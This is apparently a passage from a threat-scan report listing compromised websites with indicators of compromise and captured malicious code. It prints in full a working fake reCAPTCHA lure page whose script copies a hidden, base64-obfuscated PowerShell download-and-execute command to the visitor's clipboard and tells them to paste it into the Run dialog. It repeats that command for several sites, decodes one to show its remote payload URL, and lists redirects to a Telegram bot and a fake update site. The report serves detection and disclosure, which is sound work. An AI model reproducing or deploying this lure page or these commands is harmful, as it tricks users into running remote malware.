}, "CaptchaElements": [ "ification ID: <span id=\"verification-id\">146820</span>\"", "} function hideCaptchaLoading() { che", "} function hideCaptchaCheckbox() { che", "et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec", "let checkboxBtn = document.getElementById(\"checkbox\"); let chec", "heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri", "let verifywindow = document.getElementById(\"verify-window\"); functi", "andomNumber(); document.getElementById('verification-id').textContent = veri", "ect(); document.execCommand(\"copy\"); doc", "tempTextArea.select(); docum", "href=\"https://cdnjs.cloudflare.com/ajax/libs/font-", "</div> <script> let checkb" ], "HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n 
background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n 
font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span 
class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n 
showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function 
isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n", "ThreatLevel": "High" }
https://www.zamilgroups.com/
Total findings: 1
Indicators of Compromise
Type | Value |
---|---|
URL | https://t.me/LearnUSDT_bot?start=540835569 |
Malicious Code Sample
JSON Technical Data
{ "URL": "https://www.zamilgroups.com/", "URLs": "https://t.me/LearnUSDT_bot?start=540835569", "HTML": "<!DOCTYPE HTML>\r\n<html>\r\n <head>\r\n <meta http-equiv=\"refresh\" content=\"7; url='https://t.me/LearnUSDT_bot?start=540835569'\" />\r\n </head>\r\n <body>\r\n </body>\r\n</html>", "ThreatLevel": "None" }
https://lucprofessional.grupomoltz.com.br/
Total findings: 3
Suspicious Patterns
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
JSON Technical Data
https://laborpartyjo.com/
Total findings: 3
Suspicious Patterns
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
JSON Technical Data
https://www.thesignaturemag.salviatech.com/
Total findings: 3
Suspicious Patterns
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
JSON Technical Data
https://mail.cambodiatouristservice.com/
Total findings: 2
Indicators of Compromise
Type | Value |
---|---|
URL | https://browser.certif-update.website/ |
URL | https://browser.certif-update.website/ |
Malicious Code Sample
JSON Technical Data
{ "URL": "https://mail.cambodiatouristservice.com/", "URLs": [ "https://browser.certif-update.website/", "https://browser.certif-update.website/" ], "HTML": "<!DOCTYPE HTML>\r\n<html lang=\"en-US\">\r\n <head>\r\n <meta charset=\"UTF-8\">\r\n <meta http-equiv=\"refresh\" content=\"0; url=https://browser.certif-update.website/\">\r\n <script type=\"text/javascript\">\r\n window.location.href = \"https://browser.certif-update.website/\"\r\n </script>\r\n <title>Loading</title>\r\n </head>\r\n <body>\r\n\t </body>\r\n</html>", "ThreatLevel": "None" }
https://my.salviatech.com/
Total findings: 3
Suspicious Patterns
Malicious Code Sample
PowErsHeLL -W hiddEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`;
JSON Technical Data
{ "URL": "https://my.salviatech.com/", "Base64Strings": { "Base64": "aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=", "Decoded": "iex (iwr 'https://nicostudio.it/pZJHqter.txt' -UseBasicParsing).Content" }, "URLs": [ "https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css", "https://use.fontawesome.com/releases/v5.0.0/css/all.css", "https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png" ], "PowerShellCommands": "PowErsHeLL -W hiddEn \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex\"`;\r", "ClipboardCommands": "PowErsHeLL -W hiddEn ", "SuspiciousKeywords": [ "\u2705", "I am not a robot", "Verification ID", "reCAPTCHA Verification", "Verify You Are Human", "To better prove you are not a robot", "I'm not a robot", "<script>" ], "ClipboardManipulation": [ "...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...", "...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..." ], "PowerShellDownloads": { "FullMatch": "| iex", "Context": "...dC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex\"`; stageClipboard(commandToRun, verification_id); }..." 
}, "CaptchaElements": [ "ification ID: <span id=\"verification-id\">146820</span>\"", "} function hideCaptchaLoading() { che", "} function hideCaptchaCheckbox() { che", "et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec", "let checkboxBtn = document.getElementById(\"checkbox\"); let chec", "heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri", "let verifywindow = document.getElementById(\"verify-window\"); functi", "andomNumber(); document.getElementById('verification-id').textContent = veri", "ect(); document.execCommand(\"copy\"); doc", "tempTextArea.select(); docum", "href=\"https://cdnjs.cloudflare.com/ajax/libs/font-", "</div> <script> let checkb" ], "HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n 
background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n 
font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span 
class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n 
showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function 
isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `PowErsHeLL -W hiddEn \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n", "ThreatLevel": "High" }
http://82.146.62.232/
Total findings: 3
Suspicious Patterns
Malicious Code Sample
